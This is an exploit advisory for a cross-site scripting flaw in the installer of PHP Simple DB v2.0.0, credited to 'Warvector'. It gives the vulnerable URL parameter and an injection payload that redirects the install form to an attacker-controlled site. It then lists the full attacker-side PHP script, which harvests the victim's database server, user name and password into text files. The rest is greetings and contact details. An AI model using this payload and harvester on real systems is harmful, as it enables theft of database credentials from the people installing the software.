  **************************************************
**                                                  **
**     PHP Simple DB v2.0.0 by Emmanuel Hidalgo     **
**       Exploited by Warvector                     **
**         via Cross Site Scripting  (XSS).         **
**                                                  **
  **************************************************

-===================================================================================================================================-
Epic fail found by: Warvector
What Fail Is It ? : XSS (Cross Site Scripting)
Exploit written by: Warvector
Website: www.warveblog.tuxfamily.org
Published the 1st time: http://warvector.e3b.org/exploit/XSS in PHPSIMPLEDB exploited by Warvector.txt
Date of 1st online: 2009-07-31

Release of 17:43 21/02/2010: http://warveblog.tuxfamily.org/index.html/exploit/XSS%20in%20PHPSIMPLEDB%20exploited%20by%20Warvector.txt
-====================================================================================================================================-


~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~____I-]__Exploit______~~~
~~~___II-]__Links________~~~
~~~__III-]__Gr33tz_______~~~
~~~___IV-]__Contact_Me___~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~


~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~____I-]__Exploit______~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
<?php
/*###############################################################################################################################
##                                                                                                                               ##
##    During the installation of PHP Simple DB v2.0.0 the variable tag is vulnerable via Cross Site Scripting (XSS),             ##
##    inject this html code, the user who saves his information, that will be sent in this page which saves it in .txt files.    ##
##                                                                                                                               ##
##      ** Inject Me ! **                                                                                                        ##
##        Vulnerable URL:                                                                                                        ##
##        http://[WEBSITE]/phpsimpledb_v2/manage/projets/detail/index.php?tag=                                                   ##
##                                                                                                                               ##
##        xHTML, JavaScript or other code which can be injected (after [...]?tag=):                                              ##
##        %22%3E%3C/form%3E%3Cform%20action=http://www.cracker-website.com/exploit.php%20method=get%3E%                      ##
##                                                                                                                               ##
  ###############################################################################################################################*/

///////// Begin exploit.php /////////

/*****
	I have not secured against XSS on the page "exploit.php", if you want secure it, add htmlentities(), htmlspecialchars()...etc.
*****/

$wh = 0;
if(isset($_GET['name']))
{
$name = $_GET['name'];
$wh++;
}
if(isset($_GET['desc']))
{
$desc = $_GET['desc'];
$wh++;
}
if(isset($_GET['bddServer']))
{
$bddServer = $_GET['bddServer'];
$wh++;
}
if(isset($_GET['bddBdd']))
{
$bddBdd = $_GET['bddBdd'];
$wh++;
}
if(isset($_GET['bddUser']))
{
$bddUser = $_GET['bddUser'];
$wh++;
}
if(isset($_GET['bddPass']))
{
$bddPass = $_GET['bddPass'];
$wh++;
}
if(isset($_GET['outputPath']))
{
$outputPath = $_GET['outputPath'];
$wh++;
}
while($wh <= 7)
{
$wh++;
$fp = fopen('name.txt', 'w');
fwrite($fp, $name);
fclose($fp);

$fp2 = fopen('description.txt', 'w');
fwrite($fp2, $desc);
fclose($fp2);

$fp3 = fopen('server.txt', 'w');
fwrite($fp3, $bddServer);
fclose($fp3);

$fp4 = fopen('bdd.txt', 'w');
fwrite($fp4, $bddBdd);
fclose($fp4);

$fp5 = fopen('user.txt', 'w');
fwrite($fp5, $bddUser);
fclose($fp5);

$fp6 = fopen('password.txt', 'w');
fwrite($fp6, $bddPass);
fclose($fp6);

$fp7 = fopen('outputPath.txt', 'w');
fwrite($fp7, $outputPath);
fclose($fp7);
}
echo "<script>document.location='" .$_SERVER['HTTP_REFERER']. "';</script>
     <noscript><META HTTP-EQUIV=\"Refresh\" CONTENT=\"60; URL=" .$_SERVER['HTTP_REFERER']. "\"></noscript>"// Redirection to the installation form via Javascript, else if noscript via meta HTML.

///////// End of dpo.php /////////
?>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~___II-]__Links________~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+ Download PHPSIMPLEDB: http://www.phpsources.org/ressources-divers-php370.htm +
+ Warvector's Blog (French): http://warveblog.tuxfamily.org/ +


~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~__III-]__Gr33tz_______~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greetz My Friends:
Sh0ck, Purple-Eye, Yacodo, Silieno...And All Others I Forget and who know me.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~___IV-]__Contact_Me___~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Please, for more information or if you have any question, add this address, don't send mail,  I'll not respond, thanks.
@ Via MSN: w[AT]rvector[DOT]gov @